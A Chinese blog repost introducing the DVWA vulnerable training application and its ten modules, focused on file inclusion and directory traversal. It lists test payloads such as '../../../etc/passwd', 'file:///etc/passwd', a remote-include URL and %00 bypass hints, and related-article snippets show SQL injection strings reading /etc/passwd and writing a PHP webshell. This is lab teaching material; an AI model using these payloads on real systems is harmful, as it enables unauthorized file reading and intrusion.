DVWA环境

摘要:
DVWADVWA是一个用于安全漏洞识别的PHP/MYSQLWEB应用程序,它主要为安全专业人员提供一个测试其专业技能和工具的法律环境,DVWA有十个模块:BruteForceCommandInjectionCSRFileInclusionFileUploadInsecureCAPTCHASQLInjectionSQLInjection XSSXSS注意:DVWA1.9代码分为四个安全级别:低、中、高、不可能。文件=内容目录遍历和文件包含之间存在一些差异:目录遍历可以读取除web根目录之外的目录。根本原因是没有为该系统严格设置webapplication的路径访问权限。
DVWA
  DVWA是一个用来进行安全脆弱鉴定的PHP/MYSQL WEB应用,主要是为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范过程
DVWA一共有十个模块分别是:
  • Brute Force   (暴力破解)
  • Command Injection (命令行注入)
  • CSRF(跨站请求伪造)
  • File Inclusion (文件包含)
  • File Upload (文件上传)
  • Insecure CAPTCHA (不安全的验证码)
  • SQL Injection (SQL注入)
  • SQL Injection(Blind)(sql盲注)
  • XSS(Reflected)(反射型跨站脚本)
  • XSS(Stored)(存储型跨站脚本)
注意:
     DVWA1.9代码分为四种安全级别:Low,Medium,High,Impossible。初学者可以通过比较四种级别的代码,接触到一些PHP代码审计内容
File Inclusion是文件包含漏洞,是指当服务器开始allow_url_include选项时4,可以通过PHP某些特性函数( include,require include_once,require_once)利用URL去动态包含文件,此时若果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行,文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开市起PHP配置中的allow_url_fopen选项(选项开启之后,服务器运行包含一个远程的文件)
文件包含漏洞的一般特征如下:
?page=a.PHP
?home=a.html
?file=content
目录遍历(Directory traversal)和文件包含(File include)的一些区别:
目录遍历是可以读取web根目录以外的其他目录,根源在于web application的路径访问权限设置不严,针对的是本系统。文件包含是通过include函数将web根目录以外的目录文件被包含进来,分为LFI本地文件包含和RFI远程文件,包含几种经典的测试方法:
?file=../../../../../etc/passwdd
 
?page=file:///etc/passwd
 
?home=main.cgi
 
?page=http://www.a.com/1.php
 
http://1.1.1.1/../../../../dir/file.txt
编码绕过字符过滤:
可以使用多种编码方式进行绕过
%00嵌入任意位置
.的利用
 
 
 
 
 
 
 

免责声明:文章转载自《DVWA环境》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇Linux使用free命令buff/cache过高linux下deb包的管理及制作 | 一次成功下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Kali学习笔记40:SQL手工注入(2)

上一篇讲到可以通过注入得到数据库中所有的表信息 而SQL注入能不能做数据库之外的事情呢? 读取文件: ' union select null,load_file('/etc/passwd') -- 为了方便进行测试,后边我使用Burpsuite 既然可以读取文件了,那么也就可以写文件:比如经典的PHP一句话 ' union select null,"&l...

Windows下DVWA安装指南

注意:DVWA需要依赖httpd、PHP、MySQL、php-mysql等应用或组件,最简单的方法是安装wampserver(http://www.wampserver.com/),安装完了所需的各种依赖部件全部搞定。 1、下载DVWA(http://www.dvwa.co.uk/) 2、要确保可以进入http://localhost/phpmyadmin...

DVWA(三):SQL injection 全等级SQL注入

(本文不定期更新) 一、所需环境: 1.DVWA 2.web环境 phpstudy/wamp 3.burp suite 二、SQL注入产生的原因:   程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患 用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作。 三、关于SQL注入需要注意...

Kali学习笔记39:SQL手工注入(1)

终于到了SQL注入 最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞 SQL注入的原理这里就不说了,百度 打开DVWA,SQL注入测试模块 测试单引号,发现出错,于是想到测试语句: 1' or '1'='1 成功: 测试是否存在漏洞: 1' and '1'='1 如果返回数据,但是1' and '1'='0 不返回数据,代表存在sql注入 或者简...

DVWA(一):关于DVWA的基本介绍

 一、关于DVWA的搭建及报错问题:    传送门     上面链接主要解决安装DVWA报错的问题,这里防止自己再去找,所以记一下。    (1)安装DVWA需要一个web环境,我实在win2003系统(xss_upload虚拟机)里安装的。    web环境是phpstudy2018(也可用wamp,有一个即可)    将DVWA解压好以后打开confi...